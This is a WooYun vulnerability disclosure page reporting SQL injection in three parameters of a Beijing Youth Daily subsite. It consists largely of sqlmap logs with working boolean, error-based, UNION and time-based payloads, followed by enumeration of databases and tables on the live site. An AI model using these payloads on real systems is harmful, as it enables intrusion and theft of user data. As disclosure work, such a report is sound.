当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157191

漏洞标题:北青网某分站存在多处存在SQL注射漏洞(明文密码可泄漏网站人员的信息)

相关厂商:北青网

漏洞作者: 路人甲

提交时间:2015-12-01 12:02

修复时间:2016-01-18 13:20

公开时间:2016-01-18 13:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

某分站多个参数存在注入!~~~密码明文!~~~

详细说明:

注入点一:
http://**.**.**.**/cgi/newslist.php?dir=101&page=1
dir存在注入

0.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: dir
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: dir=101' AND (SELECT 1452 FROM(SELECT COUNT(*),CONCAT(0x716d6c6371,
(SELECT (CASE WHEN (1452=1452) THEN 1 ELSE 0 END)),0x7170717671,FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PhAn'='PhAn&page=1
---
[20:22:22] [INFO] testing MySQL
[20:22:26] [INFO] heuristics detected web page charset 'ascii'
[20:22:26] [WARNING] reflective value(s) found and filtering out
[20:22:26] [INFO] confirming MySQL
[20:22:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
[20:22:28] [INFO] fetching current user
[20:22:28] [INFO] retrieved: cgi@localhost
current user: 'cgi@localhost'
[20:22:28] [INFO] fetching current database
[20:22:29] [INFO] retrieved: foodbq
current database: 'foodbq'
[20:22:29] [INFO] testing if current user is DBA
[20:22:29] [INFO] fetching current user
current user is DBA: False


1.jpg


发现比较慢,那么添加--level 3 --risk 3测试看看

[20:27:06] [INFO] testing connection to the target URL
[20:27:06] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:27:06] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[20:27:08] [INFO] target URL is stable
[20:27:08] [INFO] heuristics detected web page charset 'ascii'
[20:27:08] [INFO] heuristic (basic) test shows that GET parameter 'dir' might be
injectable (possible DBMS: 'MySQL')
[20:27:08] [INFO] testing for SQL injection on GET parameter 'dir'
[20:27:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:27:20] [WARNING] reflective value(s) found and filtering out
[20:27:38] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[20:27:48] [INFO] GET parameter 'dir' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[20:27:48] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[20:27:48] [INFO] GET parameter 'dir' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[20:27:48] [INFO] testing 'MySQL inline queries'
[20:27:48] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[20:27:48] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[20:27:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[20:27:48] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[20:27:49] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[20:28:18] [INFO] GET parameter 'dir' seems to be 'MySQL < 5.0.12 AND time-based
blind (heavy query)' injectable
[20:28:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[20:28:18] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[20:28:30] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[20:28:30] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[20:28:31] [INFO] target URL appears to have 46 columns in query
[20:29:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:29:02] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[20:29:49] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:29:51] [INFO] GET parameter 'dir' is 'MySQL UNION query (random number) - 1
to 20 columns' injectable
[20:29:51] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'dir' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 142 HTTP(s) req
uests:
---
Place: GET
Parameter: dir
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dir=-3149' OR (1819=1819) AND 'aQjz'='aQjz&page=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: dir=101' AND (SELECT 5670 FROM(SELECT COUNT(*),CONCAT(0x716a736f71,
(SELECT (CASE WHEN (5670=5670) THEN 1 ELSE 0 END)),0x7172646471,FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'qYOD'='qYOD&page=1
Type: UNION query
Title: MySQL UNION query (random number) - 46 columns
Payload: dir=101' UNION ALL SELECT 3978,3978,3978,3978,3978,3978,3978,3978,3
978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3
978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3978,3
978,3978,3978,3978,3978,CONCAT(0x716a736f71,0x7a6d43734d47524d5956,0x7172646471)
#&page=1
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: dir=101' AND 7611=BENCHMARK(5000000,MD5(0x66665079)) AND 'vtqf'='vt
qf&page=1
---
[20:30:43] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[20:30:43] [INFO] fetching current user
current user: 'cgi@localhost'
[20:30:45] [INFO] fetching current database
current database: 'foodbq'
[20:30:46] [INFO] testing if current user is DBA
[20:30:46] [INFO] fetching current user
[20:31:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[20:31:06] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
database management system users [1]:
[*] 'cgi'@'localhost'
available databases [3]:
[*] foodbq
[*] information_schema
[*] web_2_1
Database: web_2_1
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| auto_cars | 13346 |
| news | 10918 |
| auto_photo | 6252 |
| sp_t36 | 1614 |
| auto_subbrands | 1522 |
| tempdef | 711 |
| `user` | 600 |
| auto_beauty | 354 |
| auto_brands | 205 |
| auto_comment | 177 |
| auto_big_brands | 138 |
| beauty_album | 55 |
| baojia_4s | 37 |
| temp | 34 |
| fenlei | 33 |
| dealers | 28 |
| complain | 25 |
| friend_links | 23 |
| sp_t32 | 16 |
| tuijian_top | 13 |
| market_cars | 12 |
| auto_zhuanti | 10 |
| auto_ad | 9 |
| sp_t33 | 8 |
| news_top | 5 |
| sp_t28 | 5 |
| fenlei_beauty | 4 |
| navcode | 3 |
| `global` | 2 |
| article_from | 1 |
| auto_bang | 1 |
| auto_bqyc | 1 |
| auto_index | 1 |
| beauty_index | 1 |
| blank_data | 1 |
| index_car2013 | 1 |
| polymorphic | 1 |
| sp_t34 | 1 |
| sp_t35 | 1 |
+-----------------+---------+
Database: foodbq
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| news | 1266 |
| tempdef | 633 |
| `user` | 238 |
| fenlei | 28 |
| temp | 17 |
| tuijian_top | 13 |
| food_topic1 | 12 |
| auto_comment | 11 |
| news_top | 8 |
| news_top1 | 8 |
| sp_t28 | 5 |
| complain | 4 |
| friend_links | 4 |
| blank_data | 3 |
| navcode | 3 |
| pic_defaults | 3 |
| `global` | 2 |
| auto_ad | 2 |
| article_from | 1 |
| auto_index | 1 |
| food_person | 1 |
| food_right | 1 |
| food_topic | 1 |
| polymorphic | 1 |
+-----------------+---------+


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


7.jpg


8.jpg


8-1.jpg


注:
以下测试sqlmap都是有添加参数--level 3 --risk 3
注入点二:
http://**.**.**.**/newslist/107.html?dir=107
还是dir

[21:43:16] [INFO] testing connection to the target URL
[21:43:16] [INFO] heuristics detected web page charset 'ISO-8859-2'
[21:43:16] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[21:43:18] [INFO] target URL is stable
[21:43:18] [INFO] heuristics detected web page charset 'ascii'
[21:43:18] [INFO] heuristic (basic) test shows that GET parameter 'dir' might be
injectable (possible DBMS: 'MySQL')
[21:43:18] [INFO] testing for SQL injection on GET parameter 'dir'
[21:43:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:43:21] [WARNING] reflective value(s) found and filtering out
[21:43:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:43:31] [INFO] GET parameter 'dir' seems to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[21:43:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:43:31] [INFO] GET parameter 'dir' is 'MySQL >= 5.0 AND error-based - WHERE o
r HAVING clause' injectable
[21:43:31] [INFO] testing 'MySQL inline queries'
[21:43:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:43:31] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:43:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:43:32] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[21:44:00] [INFO] GET parameter 'dir' seems to be 'MySQL < 5.0.12 AND time-based
blind (heavy query)' injectable
[21:44:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:44:00] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[21:44:02] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[21:44:04] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[21:44:06] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[21:44:07] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[21:44:09] [INFO] target URL appears to be UNION injectable with 46 columns
[21:44:11] [INFO] GET parameter 'dir' is 'MySQL UNION query (NULL) - 42 to 60 co
lumns' injectable
[21:44:11] [WARNING] in OR boolean-based injections, please consider usage of sw
itch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'dir' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] N
sqlmap identified the following injection points with a total of 200 HTTP(s) req
uests:
---
Place: GET
Parameter: dir
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: dir=-1971' OR (5371=5371) AND 'eEFR'='eEFR
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: dir=107' AND (SELECT 4513 FROM(SELECT COUNT(*),CONCAT(0x7163656671,
(SELECT (CASE WHEN (4513=4513) THEN 1 ELSE 0 END)),0x7175687771,FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DbxF'='DbxF
Type: UNION query
Title: MySQL UNION query (NULL) - 46 columns
Payload: dir=107' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,CONCAT(0x7163656671,0x646d4e694a56496d6973,0x7175687771)
#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: dir=107' AND 9642=BENCHMARK(5000000,MD5(0x53795148)) AND 'LTJT'='LT
JT
---
[21:44:19] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[21:44:19] [INFO] fetching current user
current user: 'cgi@localhost'
[21:44:20] [INFO] fetching current database
current database: 'foodbq'
[21:44:20] [INFO] testing if current user is DBA
[21:44:20] [INFO] fetching current user
[21:44:20] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


9.jpg


注入点三:
这个已经被提交过滤,没有修复,继续提交,厂家引起重视吧~~~
http://**.**.**.**/zhuanti/13.html
这里可以找到一些类似下面的地址
http://**.**.**.**/cgi/news.php?id=529102
id存在注入

[21:46:01] [INFO] testing connection to the target URL
[21:46:02] [INFO] heuristics detected web page charset 'ISO-8859-2'
[21:46:02] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[21:46:03] [INFO] target URL is stable
[21:46:03] [INFO] heuristics detected web page charset 'ascii'
[21:46:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'MySQL')
[21:46:03] [INFO] testing for SQL injection on GET parameter 'id'
[21:46:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:46:03] [WARNING] reflective value(s) found and filtering out
[21:46:04] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[21:46:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:46:04] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
HAVING clause' injectable
[21:46:04] [INFO] testing 'MySQL inline queries'
[21:46:04] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:46:05] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[21:46:05] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:46:15] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based
blind' injectable
[21:46:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:46:15] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[21:46:15] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[21:46:17] [INFO] target URL appears to have 25 columns in query
[21:46:25] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] N
sqlmap identified the following injection points with a total of 53 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=529102 AND 5501=5501
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=529102 AND (SELECT 2037 FROM(SELECT COUNT(*),CONCAT(0x7175716a71
,(SELECT (CASE WHEN (2037=2037) THEN 1 ELSE 0 END)),0x7177747171,FLOOR(RAND(0)*2
))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 25 columns
Payload: id=-6535 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N
ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT
(0x7175716a71,0x50625049797763664552,0x7177747171),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=529102 AND SLEEP(5)
---
[21:47:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0
[21:47:22] [INFO] fetching current user
current user: 'cgi@localhost'
[21:47:22] [INFO] fetching current database
current database: 'foodbq'
[21:47:23] [INFO] testing if current user is DBA
[21:47:23] [INFO] fetching current user
[21:47:23] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False


10.jpg

漏洞证明:

如上

修复方案:

好歹也修复一下吧!~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-04 13:14

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置。

最新状态:

暂无